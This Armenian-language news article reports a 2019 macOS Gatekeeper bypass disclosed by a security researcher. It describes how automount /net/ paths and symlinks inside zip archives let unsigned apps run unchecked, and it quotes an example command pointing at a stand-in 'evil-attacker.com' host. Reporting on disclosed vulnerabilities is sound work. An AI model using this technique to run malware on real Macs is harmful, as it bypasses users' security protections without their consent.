Mac-ում վնասակար հավելված տեղադրելը հեշտ է: Apple-ը չի ուղղել սխալը նույնիսկ երեք ամիս անց

27: 5: 2019

Անվտանգության հետազոտող Ֆիլիպո Կավալարինն իր բլոգում տեղադրել է նախազգուշացում macOS 10.14.5-ի սխալի մասին: Սա կայանում է նրանում, որ հնարավոր է ամբողջությամբ շրջանցել Gatekeeper-ի անվտանգության միջոցները։ Ըստ Cavallarin-ի, նա Apple-ին մատնանշել է սխալն արդեն այս տարվա փետրվարին, սակայն ընկերությունը վերջին թարմացումով չի ուղղել այն։

Gatekeeper-ը մշակվել է Apple-ի կողմից և առաջին անգամ ներառվել նրա աշխատասեղանի օպերացիոն համակարգում 2012 թվականին: Դա մեխանիզմ է, որը թույլ չի տալիս հավելվածի գործարկումն առանց օգտատիրոջ իմացության և համաձայնության: Հավելվածը ներբեռնելուց հետո Gatekeeper-ն ավտոմատ կերպով ստուգում է դրա կոդը՝ տեսնելու, թե արդյոք ծրագրաշարը պատշաճ կերպով ստորագրված է Apple-ի կողմից:

Իր բլոգային գրառման մեջ Cavallarin-ը նշում է, որ Gatekeeper-ը լռելյայնորեն համարում է և՛ արտաքին պահեստը, և՛ ցանցային բաժնետոմսերը որպես ապահով տեղակայանքներ: Հետևաբար, ցանկացած հավելված, որը գտնվում է այս թիրախներում, կարող է ավտոմատ կերպով գործարկվել՝ առանց Gatekeeper-ի ստուգումն անցնելու: Հենց այս հատկանիշը կարող է օգտագործվել վնասակար ծրագրեր գործարկելու համար՝ առանց օգտագործողի իմացության:

Մի ասպեկտ, որը թույլ է տալիս չարտոնված մուտք գործել, ավտոմատ ամրացման գործառույթն է, որը թույլ է տալիս օգտատերերին ավտոմատ կերպով տեղադրել ցանցի համօգտագործումը՝ պարզապես նշելով «/net/»-ով սկսվող ուղին: Որպես օրինակ, Cavallarin-ը բերում է «ls /net/evil-attacker.com/sharedfolder/» ուղին, որը կարող է ստիպել օպերացիոն համակարգը բեռնել «sharefolder» թղթապանակի բովանդակությունը հեռավոր վայրում, որը կարող է պոտենցիալ վնասակար լինել:

Սպառնալիքի գործելակերպը կարող եք դիտել տեսանյութում.

Մեկ այլ գործոն է այն փաստը, որ եթե մի zip արխիվ, որը պարունակում է հատուկ սիմհղում, որը տանում է դեպի automount ֆունկցիա, այն չի ստուգվի Gatekeeper-ի կողմից: Այս կերպ տուժողը կարող է հեշտությամբ ներբեռնել վնասակար արխիվը և բացել այն՝ թույլ տալով հարձակվողին գործարկել Mac-ում գրեթե ցանկացած ծրագրակազմ՝ առանց օգտատիրոջ իմացության: Finder-ը, որը լռելյայն թաքցնում է որոշակի ընդլայնումներ, նույնպես ունի այս խոցելիության իր բաժինը:

Կավալարինն իր բլոգում նշում է, որ Apple-ն այս տարվա փետրվարի 22-ին ուշադրություն է հրավիրել macOS օպերացիոն համակարգի խոցելիության վրա։ Սակայն մայիսի կեսերին Apple-ը դադարեցրեց կապը Cavallarin-ի հետ, ուստի Cavallarin-ը որոշեց ամբողջը հրապարակել:

Աղբյուրը ` FCVL

Թեմաներ: պահեստավորում, ավտոմատ կերպով, MacOS, Տեսագրություն, Կարգավորումներ, ֆունկցիան, օգտագործող, Դիմում, Apple

Հոդվածի քննարկում

Ձեր անունը

Ձեր մեկնաբանությունը

Լրացնելով վերը նշված տվյալները՝ ես հաստատում եմ, որ ընկերությունը TEXT FACTORY s.r.o., գրանցված է Բռնոյում, Դուրչակովա 336/29, Černá Pole, փոստային ինդեքս՝ 613 00, ID համար՝ 06157831, գրանցված է Brno շրջանային դատարանում, C բաժնում։ , ներդիր 100399, կմշակի իմ կողմից լրացված գրանցման ձևում ներկայացված իմ անձնական տվյալները՝ ելնելով TEXT FACTORY s.r.o.-ի օրինական շահերից՝ համաձայն 6-րդ հոդվածի 1-ին կետի նամակի։ զ) GDPR-ի և օրենսդրական պարտավորությունների կատարման համար (հոդված 6, պարբերություն 1, կետ գ) GDPR), հետևյալ նպատակներով՝ ապահովելու TEXT FACTORY s.r.o.-ի կողմից շահագործվող կայքերի այցելուների թույլտվությունը՝ ակտիվորեն նպաստելու հրապարակված հոդվածներին կամ քննարկմանը: ֆորումներ և օգտվելով TEXT FACTORY s.r.o.-ի իրավունքներից՝ որպես այս քննարկման ֆորումների ադմինիստրատորի: Անձնական տվյալների և իրավունքների մշակման մասին լրացուցիչ տեղեկություններ կարելի է գտնել այստեղ Անձնական տվյալների պաշտպանության դասեր. ամբողջ տեքստը

Դա կարող է լինել ձեզ հետաքրքրում է

Առնչվող